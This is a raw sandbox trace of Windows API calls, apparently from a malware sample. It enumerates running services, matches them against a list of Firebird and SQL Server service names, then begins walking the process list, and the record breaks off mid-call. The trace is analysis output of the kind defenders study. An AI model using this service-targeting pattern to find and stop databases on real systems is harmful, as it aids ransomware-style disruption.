[0171.100] Sleep (dwMilliseconds=0x1f4) [0171.741] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c268 [0171.742] EnumServicesStatusExW (in: hSCManager=0x458c268, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0171.742] GetLastError () returned 0xea [0171.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x46a4f50 [0171.742] EnumServicesStatusExW (in: hSCManager=0x458c268, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x46a4f50, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x46a4f50, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0171.743] CloseServiceHandle (hSCObject=0x458c268) returned 1 [0171.743] lstrlenW (lpString="Appinfo") returned 7 [0171.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0171.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0171.743] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0171.744] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0171.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0171.744] lstrlenW (lpString="AppXSvc") returned 7 [0171.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0171.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0171.744] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0171.744] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0171.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0171.744] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0171.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0171.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0171.744] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0171.744] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0171.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0171.744] lstrlenW (lpString="Audiosrv") returned 8 [0171.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0171.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0171.744] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0171.745] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0171.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0171.745] lstrlenW (lpString="BFE") returned 3 [0171.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0171.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0171.745] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0171.745] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0171.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0171.745] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0171.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0171.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0171.745] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0171.745] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0171.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0171.745] lstrlenW (lpString="CDPSvc") returned 6 [0171.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0171.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0171.745] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0171.745] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0171.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0171.745] lstrlenW (lpString="ClickToRunSvc") returned 13 [0171.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0171.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0171.746] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0171.746] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0171.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0171.746] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0171.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0171.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0171.746] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0171.746] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0171.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0171.746] lstrlenW (lpString="CryptSvc") returned 8 [0171.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0171.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0171.746] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0171.746] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0171.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0171.746] lstrlenW (lpString="DcomLaunch") returned 10 [0171.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0171.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0171.747] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0171.747] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0171.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0171.747] lstrlenW (lpString="DeviceAssociationService") returned 24 [0171.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0171.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0171.747] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0171.747] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0171.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0171.747] lstrlenW (lpString="Dhcp") returned 4 [0171.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0171.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0171.747] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0171.747] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0171.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0171.747] lstrlenW (lpString="Dnscache") returned 8 [0171.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0171.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0171.747] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0171.747] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0171.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0171.748] lstrlenW (lpString="DPS") returned 3 [0171.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0171.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0171.748] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0171.748] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0171.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0171.748] lstrlenW (lpString="DusmSvc") returned 7 [0171.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0171.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0171.748] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0171.748] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0171.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0171.748] lstrlenW (lpString="EventLog") returned 8 [0171.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0171.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0171.748] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0171.748] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0171.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0171.748] lstrlenW (lpString="EventSystem") returned 11 [0171.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0171.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0171.748] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0171.749] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0171.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0171.749] lstrlenW (lpString="FontCache") returned 9 [0171.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0171.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0171.749] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0171.749] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0171.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0171.749] lstrlenW (lpString="gpsvc") returned 5 [0171.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0171.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0171.749] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0171.749] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0171.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0171.749] lstrlenW (lpString="iphlpsvc") returned 8 [0171.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0171.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0171.749] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0171.749] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0171.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0171.775] lstrlenW (lpString="KeyIso") returned 6 [0171.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0171.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0171.775] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0171.775] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0171.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0171.775] lstrlenW (lpString="LanmanServer") returned 12 [0171.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0171.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0171.775] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0171.775] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0171.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0171.775] lstrlenW (lpString="LanmanWorkstation") returned 17 [0171.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0171.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0171.775] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0171.775] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0171.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0171.776] lstrlenW (lpString="lfsvc") returned 5 [0171.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0171.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0171.776] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0171.776] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0171.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0171.776] lstrlenW (lpString="lmhosts") returned 7 [0171.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0171.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0171.776] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0171.776] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0171.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0171.776] lstrlenW (lpString="LSM") returned 3 [0171.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0171.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0171.776] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0171.776] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0171.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0171.777] lstrlenW (lpString="MpsSvc") returned 6 [0171.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0171.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0171.777] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0171.777] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0171.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0171.777] lstrlenW (lpString="NcbService") returned 10 [0171.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0171.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0171.777] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0171.777] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0171.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0171.777] lstrlenW (lpString="netprofm") returned 8 [0171.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0171.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0171.777] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0171.777] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0171.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0171.777] lstrlenW (lpString="NgcSvc") returned 6 [0171.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0171.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0171.777] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0171.778] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0171.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0171.778] lstrlenW (lpString="NlaSvc") returned 6 [0171.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0171.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0171.778] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0171.778] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0171.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0171.778] lstrlenW (lpString="nsi") returned 3 [0171.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0171.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0171.778] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0171.778] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0171.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0171.778] lstrlenW (lpString="PcaSvc") returned 6 [0171.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0171.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0171.778] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0171.779] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0171.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0171.779] lstrlenW (lpString="PlugPlay") returned 8 [0171.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0171.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0171.779] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0171.779] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0171.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0171.779] lstrlenW (lpString="Power") returned 5 [0171.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0171.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0171.779] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0171.779] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0171.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0171.779] lstrlenW (lpString="ProfSvc") returned 7 [0171.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0171.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0171.779] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0171.779] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0171.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0171.779] lstrlenW (lpString="RpcEptMapper") returned 12 [0171.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0171.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0171.779] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0171.779] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0171.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0171.780] lstrlenW (lpString="RpcSs") returned 5 [0171.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0171.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0171.780] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0171.780] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0171.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0171.780] lstrlenW (lpString="SamSs") returned 5 [0171.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0171.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0171.780] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0171.780] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0171.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0171.780] lstrlenW (lpString="Schedule") returned 8 [0171.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0171.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0171.780] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0171.780] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0171.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0171.780] lstrlenW (lpString="SecurityHealthService") returned 21 [0171.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0171.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0171.781] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0171.781] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0171.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0171.781] lstrlenW (lpString="SENS") returned 4 [0171.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0171.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0171.781] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0171.781] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0171.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0171.781] lstrlenW (lpString="ShellHWDetection") returned 16 [0171.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0171.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0171.781] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0171.781] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0171.781] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0171.781] lstrlenW (lpString="Spooler") returned 7 [0171.781] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0171.781] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0171.781] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0171.784] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0171.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0171.785] lstrlenW (lpString="StateRepository") returned 15 [0171.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0171.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0171.785] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0171.785] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0171.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0171.785] lstrlenW (lpString="SysMain") returned 7 [0171.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0171.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0171.785] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0171.785] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0171.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0171.785] lstrlenW (lpString="SystemEventsBroker") returned 18 [0171.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0171.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0171.785] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0171.785] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0171.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0171.785] lstrlenW (lpString="Themes") returned 6 [0171.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0171.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0171.786] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0171.786] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0171.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0171.786] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0171.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0171.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0171.786] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0171.786] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0171.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a4f50 | out: hHeap=0x6a0000) returned 1 [0171.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x42c [0171.790] Process32FirstW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.791] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0171.792] lstrlenW (lpString="System") returned 6 [0171.792] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0171.793] lstrlenW (lpString="smss.exe") returned 8 [0171.793] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.797] lstrlenW (lpString="csrss.exe") returned 9 [0171.797] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, 